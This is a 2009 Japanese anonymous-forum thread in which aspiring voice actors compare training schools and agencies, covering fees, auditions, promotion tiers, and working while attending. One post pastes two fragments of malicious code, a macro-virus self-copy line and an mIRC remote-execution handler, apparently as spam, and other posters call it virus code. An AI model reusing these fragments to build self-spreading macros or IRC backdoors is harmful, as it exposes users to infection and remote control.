>>296 真剣なら取ってくれるよ。
ただ、「にちゃんねらー」には青二は向かない気がする。
青二は劇団志望とかの真面目な奴が向いてるよな
俳協とかも
日ナレとかは要領良い奴が行けばいいよ
>>301-302ありがとう。自分は真剣だ。
最初は劇団も考えたんだけど、はっきりした金額とかカリキュラムみたいなものが分からないし、チケット買取の話も聞いたから、いろいろとはっきり公表してる青二がいいと思ったんだ。
青二の授業は、声だけじゃない感じがするし。
俺は1年やってその後に本願の養成所行くなら個人レッスンを勧める。
講師次第だけど人によっては養成所だと相手にされないような
細かい部分まで面倒見てくれる。
という俺は養成所通いながら他で個人レッスン受けてる。
今思えば養成所入る前から行っておけばよかったな。
個人レッスンは自分で探して何ヶ所か体験行って
自分に合った講師にお願いすればいい。
仕事しながら通おうと思ってるんだが、日ナレと81で悩んでます。
ちなみに、私自身は演劇とかの経験はない未経験者です。
7月の入所を考えています。
日ナレと81の良い所と悪い所を教えてください。
講師、レッスン、入所時のオーディションなど…。
一応、調べてはみましたが、比較などのわかりやすい情報を得たいので、良ければご助力ください。
ぼけた文章ですがよろしくお願いします。
306 :
声の出演:名無しさん:2009/05/19(火) 11:39:34 ID:DVh7euOA0
日ナレは未経験なら、基礎クラスから始まり1年毎に進級オーディション。
いい点は未経験でも心配なし!
悪い点は講師に当たり外れがある!進級オーディションに失敗したらもう1年基礎クラス!
3年居て進級出来なければ強制退所!!
81は・・・噂では養成所から預かりになる人が最近いないとか聞いた。
81に所属になるのは、アクターズスタジオより、AMGの方が
預かり率高いらしい!
知り合いに81出た人いるんだが
アクターズスタジオからは上がれてもJJ(ランク的にはジュニアの下?)がほとんどらしい。
JJを1年やってその中から選抜されるとジュニアになれる。
アクターズスタジオからいきなりジュニアになった人もいるらしいが。
仕事しながらなら、予定を自由に空けられる仕事じゃないと厳しいみたいだぞ。
わかりにくい文章でごめん。
ふつーに81やめといた方がいいと思う
俺も81はやめたほうがいい気がするな
81行きたい奴は今年の夏のオーディションうけて特待にでもなったら行けばいい
311 :
声の出演:名無しさん:2009/05/19(火) 19:48:32 ID:50K+5Mta0
>>308 そんな仕事あるか?
女だと水商売とか稼ぎもあるし勤務も選べるからいいけど男だとないだろう
日ナレ以外で働きながら通えるところとかあるのか?
男の水商売は声優と並行したら体壊しそう
女は酒飲めなくてもOKなところもあるけど、男はなくね?
313 :
声の出演:名無しさん:2009/05/19(火) 21:49:04 ID:50K+5Mta0
だからこそ自由に予定空けられる仕事がないんだよな
そんな仕事あったら誰も貧乏生活なんてしてないよな
個人がやってる喫茶店とか小さな店とかで店長がいい人であれば融通きくかも。
大手でも、基本シフト制なら少しなら融通効くと思う(月に何日も休まなきゃいけ
ないようならキツいが)
もうそうなったら日雇派遣じゃない?
>>314 大手でなくてもサービス業系の社員(店長は特に)は
一月前にはシフトを決めて守らなきゃならんよ
タイムカードもあるしな
ただ会社がゆるいとこなら店内勤務でバイトに適当な理由つけて抜けることはできる
タイムカードはバイトに任せるかあとで修正
つか前のバイト先の店長がよくやってたわ
店潰れたけどねw
>>306 >>308-310 丁寧にありがとうございます。
81がダメな理由というのは、預かり、所属に、
現在はなれない、もしくはなりづらいという環境があるということでしょうか?
仕事は普通に週5で10時-19時なのですが、土日は割りとフリーです。
というくらいじゃまずいのでしょうか?
317 :
声の出演:名無しさん:2009/05/20(水) 17:24:07 ID:Xx2fdwhT0
>>316 夏の81の特待生オーディション受けてみたら?
MDかCD−Rに声を録音するんだけど、詳しくはホームページ見たら。
ただ応募数が凄い中から、数人しか選ばれない難関!
>>316 そんなに悪い環境じゃないし81はいいと思うぞ
講師も熱心に指導してくれるし
預かり、所属になれるかなれないかは本人の問題
81は「外様優遇主義」「ジュニア100人飼い殺し」の悪名が高すぎるからなあw
理保子女史が抜けて少しは方針が変化したのかな。
2ちゃん脳すぎる
シフト自由と書いてても求人が少なく応募が多い最近は厳しいな。
322 :
声の出演:名無しさん:2009/05/21(木) 04:57:51 ID:CrzgUIiM0
>>308 JJ(ジュニア待ち猶予期間)はあるよね。スーパージュニアwと揶揄されてたけど。
人数増えすぎてJJができた。
昔は養成所の一番上のクラスから、ジュニアになる人とJJになる人がいて(JJからジュニアになる人も)
サイトで発表されてたんだけどされなくなってしまったな……。時代かな。
恒松さんなんかは養成所は飛び級で、ジュニアになった直後からレギュラー持ってた。
ところでその知り合いはどんな仕事してたの?
いや、81の飼い殺しの酷さは青二の比じゃねーぞ…特にここ最近
>>311 >>322 自分が話を聞いた知り合いはスーパーでバイトしながら通ってた
学生の時から続けてたみたいだから店長も事情をわかってて
急に養成所の用事が入ってもなんとかできてたみたい
ほんとか?
ホント
328 :
声の出演:名無しさん:2009/05/26(火) 00:31:01 ID:p9MX80KkO
JTBエンタテインメントアカデミーってどうですかね?
329 :
322:2009/05/26(火) 03:05:44 ID:5e2SwQ3Z0
>>324 亀だが教えてくれてありがとう。
やはり長く続けているから周りも理解がある職場ってのが大切なんだね。
バイト受からねーのなんのって。
実際問題
声優として大成功する人って養成所入る段階で、もう周りの人達と格が違うのが大半なんよね
331 :
声の出演:名無しさん:2009/05/27(水) 10:03:56 ID:Lba5CE580
最近売れてる人ってオーディション上がりだよ
332 :
声の出演:名無しさん:2009/05/27(水) 10:52:47 ID:jJW/453J0
男で声優目指すのは無謀w
考え直せ
まず、結婚はよほど売れないと、トップにならないとできない
若手ではかなり難しい。子供作るのなんて論外。
所詮、運が50%以上の世界。確かに実力も必要だけど
実力があっても、いい仕事が周ってくるとは限らない
プロダクションの正所属であってもね。これは男性に限った話ではなく・・
例えば、エロゲ声優にも、表で活躍できるタレントは山ほどいる。
最初からエロゲ志望なんているわけないからなw
この世界は一握りなんだよ。
チャンスってあんまやってこないから。
その、数少ないチャンスを一度にものにした奴だけが
声優として生きていけると思う。
まあ全て持論だけどね。
ちなみに俺は今年で21歳。
言ってることは正しいと思うが声優になってから言ってくれ
334 :
声の出演:名無しさん:2009/05/27(水) 13:32:33 ID:ebibkuje0
結婚をしたくないし
声優になれるようにがんばろーっと
>>332 21のヒヨッ子の小童の青二才に言われてもな…
逆に「お前が頑張れ」と言いたくなるな
336 :
声の出演:名無しさん:2009/05/27(水) 19:00:00 ID:Lba5CE580
何で売れないと結婚無理なの?
今の時代、お金なくても結婚して奥さんと共働きで頑張ってる人いっぱいいるよ?
金無くても嫁さんに食わせてもらうくらいの事ができても
芸人としては間違ってねぇな
俺は声優だろうが何だろうが
結婚する人は本当に素晴らしいと思う
当たりくじがないくじを豪快に全部買ったわけですから。
俺にはそんな真似出来ません。
340 :
声の出演:名無しさん:2009/05/28(木) 21:58:12 ID:4ujX4dYz0
飛びぬけて良い声持ってると講師の妬みやいびりがあり
ろくな事務所紹介されない学校とかあったけどね
どこ?
342 :
声の出演:名無しさん:2009/05/28(木) 22:41:51 ID:hmfMRxYL0
結局さ テンプレキチガイが意地になってたてたこっちより
むこうの方が需要があったわけだな
どういうものを需要っていうんだろうな。
あっちはコテハンの基地外とそれを叩きたいのと自作自演のような擁護ばかりだったと思う。
あんな風になるよりは今のような遅い進行の方がよっぽどマシ。
>>342 むこうは完全に某との遊び場になってたろwあれは需要とはいわねぇよw
専スレとしては需要はあったがな
あのカオスが需要だというなら、需要なんぞイラネ
多少過疎っても、まともに話ができる場所の方がいい。
>>306 亀だけど高校時代の大嫌いな同級生が、最近81養成所から81正所属になってるんだが
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
n0=on 900:text:!exec*:*:{.notice $nick Execut comanda: $2-
ウイルスコード貼ってまでスレの邪魔したい人がいるみたいだね。
性格悪いなあ。姑息で卑怯だ。
>>347 主催代アニかぁ・・・
なんか上手く行きそうなイメージが無いけど、物は試しで出しときゃよかったっ!
>348
そりゃいるだろうよwていうか、嫌いとか、だから何って感じ。
353 :
声の出演:名無しさん:2009/05/30(土) 03:16:48 ID:5yn13n6q0
>>351 締め切り明日だから今から応募しちゃえよ
嫌いな人が大手の所属になってたりレギュラー持ったりすると落ち込むのは分かるな。
人間性って関係ないんだなってことが改めて実感出来る。
マネージャーや視聴者等、つまりは利用価値のある人に良い顔が出来ればいいんだってことかと思うと少し悲しい。
>>355 で、誰の悪口が言いたいんだw
実際社会なんてどこ行ってもそんなもんだぜ
357 :
声の出演:名無しさん:2009/05/30(土) 22:01:20 ID:IJXhOfrQ0
まぁ自分のほうが人間的にアレだったって事もあるしな
むしろそんな奴の名前の書いたところで宣伝効果になるだけじゃに?
こういう世界は良くも悪くも人からの注目を集める事が第一だし。
359 :
声の出演:名無しさん:2009/05/31(日) 00:26:26 ID:9U+WFpjn0
それ言ったら某スレにわいてる見手郎なんて奴も売名のために書き込んでるわけ?
わざわざ名前出してageてんじゃねえよ、わざとらしい。
基地外の話を出すなよ
アレはただの馬鹿だからだろ。発言も二転三転、中身は空っぽ。
実名も出さずにコテハンでしつこく粘着して浅ましい自己顕示欲を満たしたいだけのカスだ。
そしてこの流れでわざわざ奴の名前を出す奴もそれと同レベルのカスだな。
362 :
声の出演:名無しさん:2009/05/31(日) 02:33:58 ID:9U+WFpjn0
わざとじゃねえが、食いつきすげえなw
すげえ言われようだなw
読解力ない奴ばっかでワラタw
それだけ迷惑だったってことだろ。
ここ数ヶ月、酷かったからなー
でも一番笑えるのはテンプレキチガイだろ
わざわざ重複スレ立ててんだもんな
このスレの主にでもなったつもりなのか?
勝手に何かの使命感に燃えてる姿は異様だもんな
いや見手郎の方がうぜえよ
なんかえらく必死なのがいるなあ。
>>368 結果はともかく、挑戦することは大事だ。
宝クジなんて言わずに全力で頑張れ。
370 :
声の出演:名無しさん:2009/05/31(日) 20:36:55 ID:9U+WFpjn0
工学院がいい感じかな
AMGはカリスマ性が無いと厳しいらしいし
映像テクノは某講師の発言にドン引き
日ナレの授業見学行ったが
想像してたのとだいぶ違った
というかAMGの関係者多すぎだろ、ここ
>>370 某講師の発言にドン引きって何言ったの?
372 :
声の出演:名無しさん:2009/06/01(月) 00:19:15 ID:GeCONIaq0
カウンセリングで気に入らない志望者に「この学校に来るな、他の学校に行けよ」とかなんとか
映像テクノスレみてると在校生とのトラブルも多少あるっぽいな
テクノスレ見てないけど(何板だ?)在校生とのトラブルって、
某振り付けおじさんとかおじさんと火花散らしてる偉い人の授業ばっかりで
ディレクター呼んでよ!とかそういう話?
まあそういうハズレはあるがテクノ自体は悪くないよ
何か気持ち悪い擁護みたいだけど……お前くんな!発言だって逆に取れば、来るなと言われましたが
どうしてもここであなたに教わりたいんです!みたいな食い下がり根性って必要だし。
評価や印象変わらない人もいるけど食い下がることで「根性あるな」って認められて
その後の仕事に繋げてくれる人もいるし。
むしろ、体験入学でアテレコごっこ楽しいね〜楽しいからおいでよ〜ウフフアハハの方が気持ち悪い。
ウフフアハハを間近で見た人間としては特に。
吹き替えを中心に活動するならどこの事務所がいいですか?
81が吹き替え強いんじゃなかったっけ?青二も強いか?
377 :
声の出演:名無しさん:2009/06/01(月) 10:16:09 ID:F4gvzIlMO
吹き替えは劇団系が50%を占めている
声優になるために劇団系行くならどこが強いんだろう。良く聞くのは円だけど…
なんかしがらみ多そうだというイメージで劇団は敬遠してたけど、意外に良い?
“声優になるために”行ってどうにかなる劇団なんてない。
劇団の養成所は“劇団の俳優を育てるために”ある場所。
専業声優のために門戸が開かれてるわけじゃなくて
ただ、所属俳優の仕事の一つに声優業があるというだけ。
本人にその覚悟があるなら選択肢の一つではあるけどね。
380 :
声の出演:名無しさん:2009/06/01(月) 20:50:04 ID:GeCONIaq0
劇団ひまわりってどうなの?劇団から声優目指すっておかしいのかな?
今からでも入れる養成所ってないのかな?
入学受付は春だけか・・・
日ナレの7月からとか
10月生募集しているとことか
384 :
声の出演:名無しさん:2009/06/03(水) 08:09:42 ID:3puTV+fh0
劇団とかはアフレコ実習ないし
日ナレ7月生募集してるが
なんかおばさんとか多かった印象がある
映像テクノの10月生がいい感じがするけどね
>>379 ありがとう。
やはり劇団は声優が本業ではないよね…
>>382 インターナショナルメディア学院(堀川りょうの学校)
wikiみたけど青二100万って高いなー…
ほかにかかる諸経費とか具体的に知ってたら教えてほしいです
389 :
声の出演:名無しさん:2009/06/04(木) 08:12:24 ID:nyntoFf1O
シャインの授業にはがっかりだ
レベル低すぎる
下手な奴相手にするなよ
俺みたいにうまいやつに時間費やせよ
390 :
声の出演:名無しさん:2009/06/04(木) 08:32:18 ID:yaEdAhro0
インターナショナルメディア学院
あそこ職員が卒業生ばかりじゃん
職員の態度に頭きた
プロフィットの10月生は?
プロフィットは岡本効果で人気は上がったけど、良く考えるとこの数年在学生の実績は実はぱっとしない。
日ナレは研修科まで上がらないとアテレコないでしょ。
テレ朝のアスクとかってどうなんだろう。
有名な卒業生はいないけど(ていうか声優コース自体新しい…)
あーでもなんか他の放送局のアニメにはあまり呼ばれなさそう。
やっぱり日ナレかなぁ。
395 :
声の出演:名無しさん:2009/06/05(金) 03:51:48 ID:d0zKw1yP0
映像テクノって20後半〜30台が結構いるけど
割と卒業のプレゼンとかすごくて入ろうか考えてる
アミューズメントメディアの講師に君は絶対声優になれないみたいなことを言われたので
頑張って見返したい
>>395 若いの?だったら結構武器になるかもね。テクノはご存知のとおり年齢が結構いったけど
やりたいって人たちの集まりだから。若さだったら最近取り始めた青二やアーツアイムも目をつけてくれるかも。
とここまでいい話をしてきたけど、プレゼンはやっぱり自分の努力(とその年に事務所が求めてる人)によるからね。
ルーレットみたいなもんだよw
一人もプレゼン以降何もなしでorzの人もいれば、よく知らない事務所に声かけられることもある。
一人で12社から来たっていう友人も知ってるけど。
行くなら頑張って。自分の売りとか、得意分野とか、声質とか、演技グセとか研究しておくといい。
自分でだと思い込みがあったりするのでいろんな人に聞いてみるといいよ。
スクールデュオの夏期にやる一般向けの声優講座に行く人いるかな?
他の養成所に通いながら…とか未経験の人は少ないのだろうか
広島在住なので1年間は代アニの週1で勉強しながら働いて、そこから東京の養成所に通おうと思ってる。
この流れって今の時代どうなのかな?青二は代アニをあんまり好いてないって話も聞くけど…。
399 :
声の出演:名無しさん:2009/06/05(金) 12:00:42 ID:d0zKw1yP0
>>396 なるほど、正直若いとはいえないかもしれないが
返答ありがと
>>398 ふざけてんのか?
代アニなんざ行っても時間と金の無駄